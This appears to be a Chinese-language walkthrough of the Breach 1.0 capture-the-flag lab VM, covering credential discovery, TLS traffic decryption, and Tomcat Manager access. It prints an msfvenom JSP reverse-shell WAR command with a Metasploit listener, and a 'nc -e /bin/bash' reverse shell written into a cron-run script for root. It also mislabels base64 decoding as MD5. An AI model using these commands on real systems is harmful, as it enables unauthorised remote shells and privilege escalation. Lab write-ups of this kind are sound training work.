Breach 1.0
环境配置
-
设置 VMware 上的仅主机模式网卡,勾选 DHCP 自动分配 IP,将子网改为 192.168.110.0/24
-
将靶机和 kali 连接到仅主机网卡
信息搜集
存活检测
详细扫描
后台网页扫描
网页信息搜集
Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已委托其顶级顾问,由Bill Lumbergh、CISSP和Peter Gibbons、CjEH、SEC+、NET+、A+领导,对漏洞进行控制和分析。该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。
-
查看源码发现疑似密文,并且有一个 herf 链接,点击胖子图片进行跳转
Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
-
md5 解密
cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
再次解密
pgibbons:damnitfeel$goodtobeagang$ta
-
跳转的网页
-
点击 employee portal 跳转到
-
尝试使用刚刚解密出的值进行登录
pgibbons damnitfeel$goodtobeagang$ta
成功登录
-
依次查询过滤有用信息
最终在邮件中的第三封邮件中发现 “秘密证书” 字样
并带有文件
-
下载证书
邮件上说把文件保存到这个网址
尝试访问
-
访问网页直接下载了 index.keystore 文件
-
在 View Account 页面发现了一个流量包文件,下载
并发现密码字样,密码为
tomcat
流量信息搜集
-
使用 wireshark 打开文件,发现有许多 TLS 加密的报文
-
.keystore 密钥/证书
.keystore文件是一种用于存储密钥和证书的二进制文件格式。
常见的TLS证书格式包括:
- DER格式:以.der或.crt扩展名保存的证书文件,通常包含单个X.509证书。
- PEM格式:以.pem或.crt扩展名保存的证书文件,它使用Base64编码,并使用"-----BEGIN CERTIFICATE-----“和”-----END CERTIFICATE-----"标记来界定证书内容。PEM格式可以包含单个或多个X.509证书。
在Keystore中,使用Java的keytool工具可以将DER或PEM格式的证书导入到JKS或PKCS#12格式的Keystore中。
解密:
keytool -importkeystore -srckeystore index.keystore -destkeystore breach.p12 -deststoretype pkcs12 -srcalias tomcat-importkeystore 导出keystore-srckeystore 源keystore文件-destkeystore 导出之后的证书存放路径-deststoretype 导出keystore之后的证书类型-srcalias 源alias
成功生成证书文件
-
将证书文件导入 wireshark
-
查看数据包
发现加密密文和一个网站,wireshark 已经将其解密了
-
访问网站
被浏览器的安全措施拦截
-
使用 bp 代理,拦截,放包
-
输入 wireshark 流量包解密的账号密码
tomcat Tt\5D8F(#!*u=G)4m7zB
-
成功登录进入Tomcat Manager 界面
webshell
-
生成 .war 木马文件
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=8888 -f war > shell.war
-
启动 msfconsole 并设置参数,开启监听
mscconsole
use exploit/multi/handler
set LHOST 192.168.110.140 set LPORT 8888 run
-
上传木马文件
-
打开上传的文件
-
反弹成功
提权
信息搜集
-
尝试
sudo -l
失败 -
尝试 suid 提权失败
-
搜集系统中有用信息
最终在 /var/www/5446 目录下发现了 php 文件,其中显示了数据库的 user 为 root,并且密码为空
数据库信息搜集
-
在 mysql 数据库的 user 表中发现了数据库用户 milton 及加密的密码
6450d89bd3aff1d893b85d3ad65d2ec2
-
解密密码
thelaststraw
-
查看 /etc/passwd 文件也存在该用户
尝试用其数据库密码进行登录
-
成功登录
-
尝试切换 blumbergh 用户
-
提示需要密码
-
查看用户密码文件
发现了 Bill 字样
-
在网页信息搜集时看到过 Bill 的图片
下载图片,检测是否有隐写信息
strings bill.png
-
测试登录密码
coffeestains
-
sudo -l
查看权限可以使用
tee
命令修改 tidup.shtee
命令可将一个文件输出的内容输入到另一个文件例
读取 a.txt 中文本内容写入 file.txt
cat a.txt | tee file.txt
-
查看 tidup.sh 权限
-
查看文件
说这个脚本每三分钟自动运行一次
-
创建一个文件写入命令
bash
-
写入
cat shell | sudo tee /usr/share/cleanup/tidyup.sh
-
失败,尝试使用 nc 反弹
nc -e /bin/bash 192.168.110.129 7777
-
监听,等待连接
成功 root
总结
-
TLS 加密证书、.keystore 文件
-
浏览器指明网页 https 证书不可信可使用 bp 拦截代理解决
-
Tomcat Manager 上传 msf 生成的 .war 木马实现 webshell
-
tee